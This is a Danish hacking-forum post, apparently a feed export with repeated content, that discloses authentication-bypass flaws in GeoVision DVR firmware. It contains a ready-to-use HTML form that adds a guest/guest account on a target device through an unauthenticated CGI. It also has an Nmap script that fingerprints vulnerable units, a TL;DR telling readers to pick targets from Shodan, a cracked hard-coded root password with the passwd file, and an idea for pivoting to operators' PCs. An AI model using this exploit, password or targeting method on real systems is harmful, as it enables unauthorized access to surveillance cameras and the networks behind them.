style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">body</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">div</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">html</span><span style="color: #007700">&gt;&nbsp;<br /></span></code></div></div></div><br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/6lRsT1t.png" alt="[Billede: 6lRsT1t.png]" class="mycode_img" /></div>
<br />
Jeg har valgt at bruge Javascript til at håndtere formens action, netop for at undgå, at skulle bruge en server til at køre f. eks. PHP. Dette script skal bare køres i browseren.<br />
Vær opmærksom på, at du skal bruge Internet Explorer for at bruge kameraerne, men kan oprette/fjerne brugere med andre browsere(Har selv brugt Firefox).<br />
<br />
Når vi logger ind vil vi få en meget begrænset menu, da det er administratorens, og ikke gæstens opgave at opsætte diverse indstillinger.<br />
Sjovt nok er næste kritiske fejl, at vi ved at indtaste URL'erne på diverse scripts til opsætning, bliver godkendt med vores gæstebruger, og er i stand til at ændre indstillingerne. Eftersom vi har adgang til hele webserveren, har vi også adgang til filnavnene.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/3csl4SQ.png" alt="[Billede: 3csl4SQ.png]" class="mycode_img" /></div>
Dette firmwares HTM filer:<br />
<div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;">F:\www2&gt;dir *.htm<br />
 Volume in drive F is KINGSTON<br />
 Volume Serial Number is 4C5F-67E4<br />
<br />
 Directory of F:\www2<br />
<br />
03-05-2010  03:34            20.973 2CH.htm<br />
18-09-2009  07:26             3.822 3gppSetting.htm<br />
03-05-2010  03:33             7.294 AdvIo.htm<br />
18-09-2009  07:26            10.290 CenterV2Setting.htm<br />
18-09-2009  07:26               312 CenterV2Status.htm<br />
18-09-2009  07:26             3.337 CfHddSetting.htm<br />
18-09-2009  07:26                54 CurTime.htm<br />
18-09-2009  07:26            14.344 DateSetting.htm<br />
18-09-2009  07:26             8.165 Ddns.htm<br />
18-09-2009  07:26               448 DdnsStatus.htm<br />
18-09-2009  07:26               819 DefaultOk.htm<br />
18-09-2009  07:26               201 DeviceInfo.htm<br />
18-09-2009  07:26            10.162 DiskUtil.htm<br />
18-09-2009  07:26             2.443 EmapSetting.htm<br />
18-09-2009  07:26                17 Empty.htm<br />
18-09-2009  07:26               255 ErrAdmReEntry.htm<br />
18-09-2009  07:26               287 ErrBrowserNotSupported.htm<br />
18-09-2009  07:26               247 ErrGstFull.htm<br />
18-09-2009  07:26               468 ErrNoSuchUsr.htm<br />
18-09-2009  07:26               531 ErrUsrTmOut.htm<br />
18-09-2009  07:26             4.767 FilterSetting.htm<br />
18-09-2009  07:26               404 FmtStatus.htm<br />
18-09-2009  07:26               902 Formatting.htm<br />
18-09-2009  07:26             8.683 FtpSetting.htm<br />
18-09-2009  07:26             2.208 FtpSrv.htm<br />
18-09-2009  07:26            10.222 GISSetting.htm<br />
18-09-2009  07:26               307 GISStatus.htm<br />
18-09-2009  07:26             1.359 HelpNtp.htm<br />
18-09-2009  07:26             3.559 HelpWep.htm<br />
18-09-2009  07:26             3.720 HostSetting.htm<br />
18-09-2009  07:26               203 HttpChgPort.htm<br />
18-09-2009  07:26             1.270 HttpSetting.htm<br />
12-03-2010  08:28               342 index.htm<br />
03-05-2010  03:33             1.496 InitOCXCheck.htm<br />
18-09-2009  07:26            24.161 IoMonitor.htm<br />
18-09-2009  07:26             6.042 IoOutAction.htm<br />
18-09-2009  07:26            23.537 IoSchedule.htm<br />
18-09-2009  07:26             4.925 IoTrigger.htm<br />
18-09-2009  07:26             1.665 IrisAdjusting.htm<br />
18-09-2009  07:26             3.109 iScsiSetting.htm<br />
18-09-2009  07:26             1.150 L3gpp.htm<br />
18-09-2009  07:26               774 LoadDefault.htm<br />
12-03-2016  22:30             5.539 Login.htm<br />
18-09-2009  07:26             1.173 Login3gpp.htm<br />
18-09-2009  07:26               190 Logout.htm<br />
18-09-2009  07:26             1.690 Main.htm<br />
18-09-2009  07:26             2.959 ManualRec.htm<br />
18-09-2009  07:26            10.806 Menu.htm<br />
18-09-2009  07:26               671 MenuHide.htm<br />
18-09-2009  07:26             6.943 MonitorSetting.htm<br />
03-05-2010  03:31             9.212 MotionDetection.htm<br />
18-09-2009  07:26               157 NetChgFix.htm<br />
18-09-2009  07:26               133 NetChgTmp.htm<br />
18-09-2009  07:26             2.176 NetStatus.htm<br />
18-09-2009  07:26             7.365 NetworkSetting.htm<br />
18-09-2009  07:26             4.451 NvrSetting.htm<br />
18-09-2009  07:26               305 NvrStatus.htm<br />
03-05-2010  03:30             7.284 PrivacyMask.htm<br />
03-05-2010  03:29             6.684 PtzSetting.htm<br />
18-09-2009  07:26               940 Rebooting.htm<br />
18-09-2009  07:26             1.759 RecStatus.htm<br />
12-03-2010  08:28             4.040 ReLogin.htm<br />
18-09-2009  07:26             7.006 SmtpSetting.htm<br />
18-09-2009  07:26             1.252 StreamSetting.htm<br />
18-09-2009  07:26             2.782 SysCfg.htm<br />
18-09-2009  07:26             1.423 SysLog.htm<br />
18-09-2009  07:26               836 SysReboot.htm<br />
18-09-2009  07:26               683 TestDhcp.htm<br />
18-09-2009  07:26               687 TestDhcpWire.htm<br />
18-09-2009  07:26               687 TestDhcpWlan.htm<br />
18-09-2009  07:26             1.067 UpnpSetting.htm<br />
18-09-2009  07:26               560 UserPwdErr.htm<br />
18-09-2009  07:26             7.464 UserSetting.htm<br />
03-05-2010  03:28            13.141 VideoServer.htm<br />
18-09-2009  07:26            28.565 VideoSetting.htm<br />
18-09-2009  07:26             2.427 VlsSetting.htm<br />
18-09-2009  07:26             9.061 VsmSetting.htm<br />
18-09-2009  07:26               305 VsmStatus.htm<br />
18-09-2009  07:26               858 WaitNetChg.htm<br />
18-09-2009  07:26             4.476 WeignSetting.htm<br />
18-09-2009  07:26             7.345 Wireless.htm<br />
18-09-2009  07:26             3.093 WlanScan.htm<br />
              82 File(s)        357.469 bytes<br />
               0 Dir(s)   1.596.698.624 bytes free<br />
<br />
F:\www2&gt;<br />
<br />
</div></div>
Søger man på GeoVision på Shodan, dukker der en god portion enheder op. <br />
<a href="https://www.shodan.io/search?query=geovision" target="_blank" rel="noopener" class="mycode_url">https://www.shodan.io/search?query=geovision</a><br />
Google Dorks giver kun en ubetydelig mængde. Hverken Google eller Shodan viser den reelle mængde enheder, så jeg har lavet et lille NSE script til Nmap, som bruger &lt;title&gt; tagget i kildekoden til at finde frem til de sårbare fimwares, samt response-headers til at finde en anden type firmware, som er den type jeg vil kigge på næste gang. De nyere versioner bruger tHTTPd som server-software, hvorimod de ældre versioner bruger GeoHttpServer. Eller måske bruges de til forskelligt hardware? hmm? <br />
Stilen af de forskellige firmwares kan ses i manualer for versionerne 8.12-8.x og de individuelle kameraer og videokort. <br />
<br />
vGeo.nse<br />
<div class="codeblock"><div class="title">Kode:</div><div class="body" dir="ltr"><code>-- Head --<br />
description = [[GeoVision DVR FW-FP]]<br />
author = "MXI"<br />
<br />
<br />
local shortport = require "shortport"<br />
local http = require "http"<br />
local string = require "string"<br />
<br />
<br />
-- Rule --<br />
portrule = shortport.http<br />
<br />
-- Action --<br />
action = function(host, port)<br />
    <br />
    local index = "/index.htm"<br />
    local uagent = {header={}}<br />
    uagent['header']['User-Agent'] = "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"<br />
    local response = http.get(host, port, index, uagent)<br />
    <br />
    if ( response.status == 200 ) then<br />
        local title = string.match(response.body, "&lt;[Tt][Ii][Tt][Ll][Ee][^&gt;]*&gt;([^&lt;]*)&lt;/[Tt][Ii][Tt][Ll][Ee]&gt;")<br />
                <br />
        if ( title == "GeoVision Inc. - Video Server" ) or ( title ~= "GeoVision Inc." ) then<br />
            return "GeoVision DVR: Saarbar?"<br />
        end    <br />
        <br />
        if ( response.header.server == 'GeoHttpServer' ) then<br />
            if ( title == "Login In" ) then<br />
            return "GeoVision Webcam"<br />
            else<br />
            return "GeoVision Server, men ukendt firmware"<br />
            end<br />
                        <br />
        end<br />
    end<br />
end</code></div></div><br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/YrgT78q.png" alt="[Billede: YrgT78q.png]" class="mycode_img" /></div>
<br />
De to nyere firmwares jeg har testet har haft "GeoVision Inc. - *" i titlen, så det er den string der søges efter. Samt login-formen ser således ud:<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/0uqB7K2.png" alt="[Billede: 0uqB7K2.png]" class="mycode_img" /></div>
<br />
<br />
De firmwares der bruger GeoHttpServer er desværre ikke sårbare over for ovenstående fejl, og efter hvad jeg kan se i manualerne, skal de konfigureres med en klient på en Windows-computer. Derfor kan det selvfølgelig stadig ske, at der findes andre fejl (mon ikke).<br />
<br />
Lidt forskellig klient-software kan findes på nedenstående ftp:<br />
<a href="http://ftp.geovision.tw/ftp/Eason/FTP.txt" target="_blank" rel="noopener" class="mycode_url">http://ftp.geovision.tw/ftp/Eason/FTP.txt</a><br />
<br />
<br />
Lige til sidst, så tillod jeg mig for sjovt at køre passwd-filen en tur igennem John, og uden hverken GPU eller en specielt stor password-liste, lykkedes det John at komme frem til følgende root-password(Ingen brug af shadow):<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Using default input encoding: UTF-8<br />
Loaded 1 password hash (md5crypt, crypt(3) &#36;1&#36; [MD5 128/128 XOP 4x2])<br />
Press 'q' or Ctrl-C to abort, almost any other key for status<br />
<span style="font-weight: bold;" class="mycode_b">taipei101</span>        (root)<br />
1g 0:00:00:37 DONE (2016-03-12 21:51) 0.02649g/s 32856p/s 32856c/s 32856C/s taipei101..taiohi1<br />
Use the "--show" option to display all of the cracked passwords reliably<br />
Session completed<br />
<br />
<br />
<br />
root:&#36;1&#36;&#36;2CCpv4DCVCwkFXJ56NsuF0:0:0:root:/root:/bin/sh<br />
bin:*:1:1:bin:/bin:/bin/sh<br />
daemon:*:2:2:daemon:/usr/sbin:/bin/sh<br />
sys:*:3:3:sys:/dev:/bin/sh<br />
sync:*:4:100:sync:/bin:/bin/sync<br />
ftp:*:14:50:FTP User:/var/ftp:<br />
apache:x:48:48:Apache:/var/www:/sbin/nologin<br />
postfix:x:89:89::/var/spool/postfix:/sbin/nologin<br />
nobody:*:65534:65534:nobody:/tmp:/bin/sh<br />
guest::65534:65534:guest:/home/guest:/bin/sh<br />
admin:x:500:65535:Linux User,,,:/tmp:/bin/sh<br />
videoserver:x:500:65535:Linux User,,,:/tmp:/bin/sh</blockquote>
<br />
<br />
Det ser ikke ud til at være blevet delt før, og ved en simpel Google-søgning er der heller ikke meget at hente udover Taipei og Taipei 101. Dog ikke noget password-relateret.<br />
Nu har jeg ikke tænkt mig at kigge nærmere på lige netop denne firmware, da jeg for at finde den rigtige version, er nødsaget til at - manuelt(Captcha - kunne måske bruge en solver), udpakke og greppe efter server-software samt en specifikt titel. Det er slet ikke besværligt, men tager sgu lidt tid. <br />
<br />
Root-passwordet kan i realiteten bruges til hvis man finder yderligere en sårbarhed, såsom noget command injection, telnet-aktivering, code execution osv. som ikke allerede kører som root.<br />
Et sjovt eksempel ville være at inficere den software der står for installation af de drivers der skal bruges for at håndtere forbindelsen til selve kameraerne.<br />
Herefter kan man tvinge endnu en installation, og få adgang til 'overvågerens' PC. Det er måske lidt overkill, men det er en lidt 'sej' måde at opnå pivoting/lateral movement på. <br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/j5eJAXP.png" alt="[Billede: j5eJAXP.png]" class="mycode_img" /></div>]]></description>
			<content:encoded><![CDATA[<span style="font-weight: bold;" class="mycode_b">Eh... Skulle bare have været et par linjer.... Men når man først kommer i gang med at skrive....<br />
Måske lidt i overkanten, men tag hvad i kan bruge.<br />
Skal nok lige få kigget efter fejl og rettelser.<br />
<br />
OBS: Jeg har ikke kunne finde disse sårbarheder på nettet, og vil derfor betegne dem som 0-days. Hvis andet er tilfældet, og i finder dem andetsteds, må i godt lige skrive det så jeg kan tage en kigger.<br />
<br />
TL;DR: Søg på "geovision" på Shodan og vælg en IP, brug vGeoGuest.htm til at tilføje en gæstebruger, login med guest/guest i Internet Explorer.<br />
<br />
<br />
</span><br />
Tænkte jeg lige så godt kunne dele denne, da det ikke decideret var det jeg ledte efter.<br />
Egentlig ledte jeg efter en DoS tilstand, som jeg fandt ved lidt manuel fuzzing i en ældre version af GeoVisions firmware, for godt 2 år siden. Denne fejl kunne jo være en form for overflow, som kunne være spændende at kigge på, da man ved 300+ tegns requests, mister forbindelse til serveren, der herefter ikke kan nås ved brug af ping. Det kunne tyde på at hardwaren eller webserveren crasher eller halter, men betyder stadig ikke at vi har at gøre med en sårbarhed der kan udnyttes til andet end DoS.<br />
<br />
Dengang skannede jeg en lang række danske IP'er, og lagde mærke til, at GeoVision havde en koncentreret andel af de fundne overvågningsløsninger, sammen med et par andre mærker fra andre producenter.<br />
Men eftersom de har lidt forskellige firmware-versioner til deres DVRs/NVRs, valgte jeg lige hurtigt at tage et kig på en af deres nyeste, og her fandt jeg et par hurtige fejl, som jeg lige så godt kan dele.<br />
<br />
Lige hurtigt om mit setup/miljø:<br />
- Kali 2, som bruges til mere eller mindre det hele. Køres fra USB(2.0! - Langsomt).<br />
- Firmware hentes, og der køres strings, file, hexdump osv. for at fastslå arkitektur, dynamic/static linking osv.<br />
- Binwalk og Firmware Modification Toolkit, til analyse og udpakning af filsystem, bootloader, kernel, webserver og hvad der ellers hører til.<br />
Har dog et problem med FMK i Kali 2, så jeg kan ikke kompilere og køre extract-firmware. Har brugt tid nok på det, så gider ikke mere, så længe uncramfs og unsquashfs stadig virker.<br />
Qemu system og static user sammen med Change root, til at emulere filsystemet og webserveren.<br />
GDB(cross-compiled eller Qemus indbyggede) og IDA Pro eller GDB multi-arch til at debugge. Og nej. jeg fatter ikke hvad jeg kigger på i 90% af tilfældende :P<br />
<br />
Men nu er det ikke en vejledning til firmware analyse og sårbarhedsopdagelse, så vi må hellere hoppe videre. Der er massere af engelske vejledninger til lige netop det, men det kan være jeg laver en i fremtiden, hvis jeg finder noget ekstra spændende engang.<br />
<br />
Det første jeg lagde mærke til under den grundlæggende undersøgelse, var at den kompilerede, eksekverbare fil UserSetting.cgi, ikke tjekker om vi har autoriseret, og har en tilhørende cookie. Dette kan vi bruge til at oprette/fjerne en gæstebruger, ved hjælp af en simpel form. Gæstebrugeren vil have guest/guest som henholdsvis brugernavn og kodeord. Følgende script kan bruges til dette:<br />
<br />
vGeoGuest.htm<br />
<div class="codeblock phpcodeblock"><div class="title">PHP kode:</div><div class="body"><div dir="ltr"><code><span style="color: #007700">&lt;!</span><span style="color: #0000BB">DOCTYPE&nbsp;html</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">html</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">head</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">style&nbsp;type</span><span style="color: #007700">=</span><span style="color: #DD0000">"text/css"</span><span style="color: #007700">&gt;<br /></span><span style="color: #0000BB">h3&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">color</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">white</span><span style="color: #007700">;}<br /></span><span style="color: #0000BB">p&nbsp;</span><span style="color: #007700">{</span><span style="color: #0000BB">background</span><span style="color: #007700">-</span><span style="color: #0000BB">color</span><span style="color: #007700">:</span><span style="color: #FF8000">#eef;}<br /><br /></span><span style="color: #0000BB">body&nbsp;</span><span style="color: #007700">{<br /></span><span style="color: #0000BB"> &nbsp; background</span><span style="color: #007700">-</span><span style="color: #0000BB">color</span><span style="color: #007700">:&nbsp;</span><span style="color: #FF8000">#eef;<br /></span><span style="color: #0000BB">width</span><span style="color: #007700">:</span><span style="color: #0000BB">800px</span><span style="color: #007700">;&nbsp;<br /></span><span style="color: #0000BB">margin</span><span style="color: #007700">:</span><span style="color: #0000BB">0&nbsp;auto</span><span style="color: #007700">;}<br /><br />.</span><span style="color: #0000BB">button&nbsp;</span><span style="color: #007700">{<br /></span><span style="color: #0000BB"> &nbsp; background</span><span style="color: #007700">-</span><span style="color: #0000BB">color</span><span style="color: #007700">:&nbsp;</span><span style="color: #FF8000">#bdb;<br /></span><span style="color: #0000BB"> &nbsp; border</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">none</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; color</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">white</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; padding</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">15px&nbsp;32px</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; text</span><span style="color: #007700">-</span><span style="color: #0000BB">align</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">center</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; text</span><span style="color: #007700">-</span><span style="color: #0000BB">decoration</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">none</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; display</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">inline</span><span style="color: #007700">-</span><span style="color: #0000BB">block</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; font</span><span style="color: #007700">-</span><span style="color: #0000BB">size</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">16px</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; margin</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">4px&nbsp;2px</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; cursor</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">pointer</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">font</span><span style="color: #007700">-</span><span style="color: #0000BB">weight</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">bold</span><span style="color: #007700">;}<br /><br />&lt;/</span><span style="color: #0000BB">style</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">head</span><span style="color: #007700">&gt;&lt;</span><span style="color: #0000BB">body</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">img&nbsp;src</span><span style="color: #007700">=</span><span style="color: #DD0000">"http://www.geovision.com.tw/english/images/logo.gif"&nbsp;</span><span style="color: #0000BB">align</span><span style="color: #007700">=</span><span style="color: #DD0000">"center"</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">div&nbsp;id</span><span style="color: #007700">=</span><span style="color: #DD0000">"cnt"&nbsp;</span><span style="color: #0000BB">style</span><span style="color: #007700">=</span><span style="color: #DD0000">"margin:0&nbsp;auto;width:800px;background-color:#555;text-align:center;border:1px&nbsp;dotted&nbsp;#f0f"</span><span style="color: #007700">&gt;<br /><br />&lt;</span><span style="color: #0000BB">form&nbsp;id</span><span style="color: #007700">=</span><span style="color: #DD0000">"geo"&nbsp;</span><span style="color: #0000BB">action</span><span style="color: #007700">=</span><span style="color: #DD0000">""&nbsp;</span><span style="color: #0000BB">method</span><span style="color: #007700">=</span><span style="color: #DD0000">"post"</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">h3</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">IP</span><span style="color: #007700">:&nbsp;&lt;/</span><span style="color: #0000BB">h3</span><span style="color: #007700">&gt;&lt;</span><span style="color: #0000BB">input&nbsp;type</span><span style="color: #007700">=</span><span style="color: #DD0000">"text"&nbsp;</span><span style="color: #0000BB">name</span><span style="color: #007700">=</span><span style="color: #DD0000">""&nbsp;</span><span style="color: #0000BB">id</span><span style="color: #007700">=</span><span style="color: #DD0000">"gIP"</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">Indsæt&nbsp;IP</span><span style="color: #007700">-</span><span style="color: #0000BB">adressen&nbsp;eller&nbsp;domænet&nbsp;på&nbsp;GeoVision</span><span style="color: #007700">-</span><span style="color: #0000BB">enheden</span><span style="color: #007700">&lt;/</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;&lt;</span><span style="color: #0000BB">br&nbsp;</span><span style="color: #007700">/&gt;<br />&lt;</span><span style="color: #0000BB">h3</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">Gæstebruger</span><span style="color: #007700">:&nbsp;&lt;/</span><span style="color: #0000BB">h3</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">INPUT&nbsp;type</span><span style="color: #007700">=</span><span style="color: #DD0000">"checkbox"&nbsp;</span><span style="color: #0000BB">name</span><span style="color: #007700">=</span><span style="color: #DD0000">"bEnableGuestCheck"&nbsp;</span><span style="color: #0000BB">value</span><span style="color: #007700">=</span><span style="color: #DD0000">"0"</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">Sæt&nbsp;flueben&nbsp;</span><span style="color: #007700">for&nbsp;</span><span style="color: #0000BB">at&nbsp;tilføje&nbsp;en&nbsp;gæstebruger</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">Hvis&nbsp;tjekboksen&nbsp;er&nbsp;tom</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">fjernes&nbsp;den&nbsp;eksisterende&nbsp;gæstebruger</span><span style="color: #007700">&lt;/</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;&lt;</span><span style="color: #0000BB">br&nbsp;</span><span style="color: #007700">/&gt;<br />&lt;</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">p</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">input&nbsp;id</span><span style="color: #007700">=</span><span style="color: #DD0000">'testNameHidden'&nbsp;</span><span style="color: #0000BB">type</span><span style="color: #007700">=</span><span style="color: #DD0000">'hidden'&nbsp;</span><span style="color: #0000BB">value</span><span style="color: #007700">=</span><span style="color: #DD0000">"1"&nbsp;</span><span style="color: #0000BB">name</span><span style="color: #007700">=</span><span style="color: #DD0000">'IsGuestPress'</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">INPUT&nbsp;name</span><span style="color: #007700">=</span><span style="color: #0000BB">IsGuestPress&nbsp;type</span><span style="color: #007700">=</span><span style="color: #0000BB">hidden&nbsp;value</span><span style="color: #007700">=</span><span style="color: #0000BB">1</span><span style="color: #007700">&gt;<br />&lt;</span><span style="color: #0000BB">button&nbsp;</span><span style="color: #007700">class=</span><span style="color: #DD0000">"button"&nbsp;</span><span style="color: #0000BB">onclick</span><span style="color: #007700">=</span><span style="color: #DD0000">"mHost()"</span><span style="color: #007700">&gt;</span><span style="color: #0000BB">Prøv&nbsp;</span><span style="color: #007700">:/&lt;/</span><span style="color: #0000BB">button</span><span style="color: #007700">&gt;<br /><br /><br />&lt;</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;<br />function&nbsp;</span><span style="color: #0000BB">mHost</span><span style="color: #007700">()&nbsp;{<br />var&nbsp;</span><span style="color: #0000BB">host&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"http://"&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">"gIP"</span><span style="color: #007700">).</span><span style="color: #0000BB">value&nbsp;</span><span style="color: #007700">+&nbsp;</span><span style="color: #DD0000">"/UserSetting.cgi"</span><span style="color: #007700">;<br /></span><span style="color: #0000BB"> &nbsp; document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">"geo"</span><span style="color: #007700">).</span><span style="color: #0000BB">action&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">host</span><span style="color: #007700">;<br /><br />if(</span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">"bEnableGuestCheck"</span><span style="color: #007700">).</span><span style="color: #0000BB">checked</span><span style="color: #007700">)&nbsp;{<br /></span><span style="color: #0000BB"> &nbsp; document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'testNameHidden'</span><span style="color: #007700">).</span><span style="color: #0000BB">disabled&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;<br />}<br /></span><span style="color: #0000BB"> &nbsp;<br /></span><span style="color: #007700">}<br />&lt;/</span><span style="color: #0000BB">script</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">form</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">body</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">div</span><span style="color: #007700">&gt;&lt;/</span><span style="color: #0000BB">html</span><span style="color: #007700">&gt;&nbsp;<br /></span></code></div></div></div><br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/6lRsT1t.png" alt="[Billede: 6lRsT1t.png]" class="mycode_img" /></div>
<br />
Jeg har valgt at bruge Javascript til at håndtere formens action, netop for at undgå, at skulle bruge en server til at køre f. eks. PHP. Dette script skal bare køres i browseren.<br />
Vær opmærksom på, at du skal bruge Internet Explorer for at bruge kameraerne, men kan oprette/fjerne brugere med andre browsere(Har selv brugt Firefox).<br />
<br />
Når vi logger ind vil vi få en meget begrænset menu, da det er administratorens, og ikke gæstens opgave at opsætte diverse indstillinger.<br />
Sjovt nok er næste kritiske fejl, at vi ved at indtaste URL'erne på diverse scripts til opsætning, bliver godkendt med vores gæstebruger, og er i stand til at ændre indstillingerne. Eftersom vi har adgang til hele webserveren, har vi også adgang til filnavnene.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/3csl4SQ.png" alt="[Billede: 3csl4SQ.png]" class="mycode_img" /></div>
Dette firmwares HTM filer:<br />
<div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;">F:\www2&gt;dir *.htm<br />
 Volume in drive F is KINGSTON<br />
 Volume Serial Number is 4C5F-67E4<br />
<br />
 Directory of F:\www2<br />
<br />
03-05-2010  03:34            20.973 2CH.htm<br />
18-09-2009  07:26             3.822 3gppSetting.htm<br />
03-05-2010  03:33             7.294 AdvIo.htm<br />
18-09-2009  07:26            10.290 CenterV2Setting.htm<br />
18-09-2009  07:26               312 CenterV2Status.htm<br />
18-09-2009  07:26             3.337 CfHddSetting.htm<br />
18-09-2009  07:26                54 CurTime.htm<br />
18-09-2009  07:26            14.344 DateSetting.htm<br />
18-09-2009  07:26             8.165 Ddns.htm<br />
18-09-2009  07:26               448 DdnsStatus.htm<br />
18-09-2009  07:26               819 DefaultOk.htm<br />
18-09-2009  07:26               201 DeviceInfo.htm<br />
18-09-2009  07:26            10.162 DiskUtil.htm<br />
18-09-2009  07:26             2.443 EmapSetting.htm<br />
18-09-2009  07:26                17 Empty.htm<br />
18-09-2009  07:26               255 ErrAdmReEntry.htm<br />
18-09-2009  07:26               287 ErrBrowserNotSupported.htm<br />
18-09-2009  07:26               247 ErrGstFull.htm<br />
18-09-2009  07:26               468 ErrNoSuchUsr.htm<br />
18-09-2009  07:26               531 ErrUsrTmOut.htm<br />
18-09-2009  07:26             4.767 FilterSetting.htm<br />
18-09-2009  07:26               404 FmtStatus.htm<br />
18-09-2009  07:26               902 Formatting.htm<br />
18-09-2009  07:26             8.683 FtpSetting.htm<br />
18-09-2009  07:26             2.208 FtpSrv.htm<br />
18-09-2009  07:26            10.222 GISSetting.htm<br />
18-09-2009  07:26               307 GISStatus.htm<br />
18-09-2009  07:26             1.359 HelpNtp.htm<br />
18-09-2009  07:26             3.559 HelpWep.htm<br />
18-09-2009  07:26             3.720 HostSetting.htm<br />
18-09-2009  07:26               203 HttpChgPort.htm<br />
18-09-2009  07:26             1.270 HttpSetting.htm<br />
12-03-2010  08:28               342 index.htm<br />
03-05-2010  03:33             1.496 InitOCXCheck.htm<br />
18-09-2009  07:26            24.161 IoMonitor.htm<br />
18-09-2009  07:26             6.042 IoOutAction.htm<br />
18-09-2009  07:26            23.537 IoSchedule.htm<br />
18-09-2009  07:26             4.925 IoTrigger.htm<br />
18-09-2009  07:26             1.665 IrisAdjusting.htm<br />
18-09-2009  07:26             3.109 iScsiSetting.htm<br />
18-09-2009  07:26             1.150 L3gpp.htm<br />
18-09-2009  07:26               774 LoadDefault.htm<br />
12-03-2016  22:30             5.539 Login.htm<br />
18-09-2009  07:26             1.173 Login3gpp.htm<br />
18-09-2009  07:26               190 Logout.htm<br />
18-09-2009  07:26             1.690 Main.htm<br />
18-09-2009  07:26             2.959 ManualRec.htm<br />
18-09-2009  07:26            10.806 Menu.htm<br />
18-09-2009  07:26               671 MenuHide.htm<br />
18-09-2009  07:26             6.943 MonitorSetting.htm<br />
03-05-2010  03:31             9.212 MotionDetection.htm<br />
